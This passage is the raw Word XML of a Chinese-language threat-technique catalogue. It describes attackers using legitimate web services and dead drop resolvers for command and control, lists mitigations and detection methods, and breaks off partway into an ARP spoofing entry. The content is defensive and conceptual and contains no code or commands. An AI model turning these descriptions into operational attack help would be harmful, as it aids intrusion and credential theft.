          <w:p w14:paraId="303CC17C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二进制</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>分析，日志分析，防火墙</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D76D3E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Anastasios Pingios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5486AA08" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23D92C1B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="5D7DC21A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会使用现有的合法外部</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务作为将命令中继到以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻破</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的手段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8C456C" w14:textId="541026F5" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些命令还可以包括指向</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）基础结构的指针。攻击者可能会在使用嵌入式（通常是经过混淆</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码的）域或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务上发布内容，称为死点解析器。一旦感染，受害者将会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>到达并被这些解析器重定向。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C50223D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制的流行网站和社交媒体可能会提供大量掩护，因为网络中的主机可能在入侵前已经与它们通信了。攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>更容易在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见服务（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的服务）中隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>自己</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务提供商通常使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL / TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密，反而为攻击者提供了额外的保护。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E6E7A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务还可以保护后端</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基础结构免被通过恶意软件二进制分析而发现，同时还可以实现操作弹性（因为该基础结构可以动态更改）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2122F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2543"/>
        <w:gridCol w:w="7193"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="596AD999" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="51469BF1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1CD95A53" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5AA8CAA4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="732AAC4E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络入侵防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4721117D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用通过网络签名识别特定攻击者恶意软件流量的网络入侵检测和防御系统来缓解网络级别的活动影响。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7F5E1D8E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2543" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1872D471" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>eb</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>内容</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="084CA4E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>eb</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代理来实施外部网络通信策略，防止使用未经授权的外部服务。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58A0DE46" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7C0FDA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6878F1AA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>已知或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>进程活动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>网络连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>相关的主机数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很重要</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，它们可用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>补充基于恶意软件命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>指标，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>控制签名以及基础结构或强加密的出现。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果数据已加密，则网络抓包分析需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL / TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查。分析网络数据中不常见的数据流（例如，客户端发送的数据明显多于从服务器接收的数据）。用户行为监控可能有助于检测异常活动模式。分析数据包内容以检测未遵循所用端口预期协议行为的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DBEDF0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="312"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A43C83C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="312"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25657A8C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="312"/>
        <w:ind w:left="1560"/>
        <w:sectPr w:rsidR="000F2665" w:rsidSect="00D7725A">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255A3B55" w14:textId="094C7308" w:rsidR="000F2665" w:rsidRPr="00CE16DC" w:rsidRDefault="006508E9" w:rsidP="00CE16DC">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>凭据访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D9091" w14:textId="3F1A5E8E" w:rsidR="00712D90" w:rsidRDefault="00712D90" w:rsidP="00F10A16">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>欺骗</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00712D90" w14:paraId="287E188F" w14:textId="77777777" w:rsidTr="00712D90">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04149EAE" w14:textId="6E1EDBEF" w:rsidR="00712D90" w:rsidRDefault="00712D90" w:rsidP="00712D90">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="250B1FFA" w14:textId="0B9DCA3E" w:rsidR="00AB72A8" w:rsidRDefault="00AB72A8" w:rsidP="00AB72A8">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4946">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="261836F4" w14:textId="77777777" w:rsidR="00712D90" w:rsidRDefault="00712D90" w:rsidP="00712D90">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A00FBE5" w14:textId="77777777" w:rsidR="00712D90" w:rsidRDefault="00712D90" w:rsidP="00712D90">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B6839CC" w14:textId="75F163F2" w:rsidR="00712D90" w:rsidRDefault="00712D90" w:rsidP="00712D90">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71AA5103" w14:textId="77777777" w:rsidR="00712D90" w:rsidRPr="00712D90" w:rsidRDefault="00712D90" w:rsidP="00712D90">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AB7B58" w14:textId="76D8603B" w:rsidR="00712D90" w:rsidRDefault="00712D90" w:rsidP="00712D90">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>欺骗是一种攻击，其中恶意行为者通过局域网发送伪造的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（地址解析协议）消息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这导致攻击者的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址与网络上合法计算机或服务器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0C0DA" w14:textId="60234A21" w:rsidR="00712D90" w:rsidRDefault="00712D90" w:rsidP="00712D90">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1696"/>
        <w:gridCol w:w="8040"/>
      </w:tblGrid>
      <w:tr w:rsidR="00712D90" w:rsidRPr="005C4554" w14:paraId="7C26FC78" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5C7D69B6" w14:textId="77777777" w:rsidR="00712D90" w:rsidRPr="005C4554" w:rsidRDefault="00712D90" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="524D579D" w14:textId="77777777" w:rsidR="00712D90" w:rsidRPr="005C4554" w:rsidRDefault="00712D90" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00712D90" w:rsidRPr="00671A0D" w14:paraId="6BBF6869" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
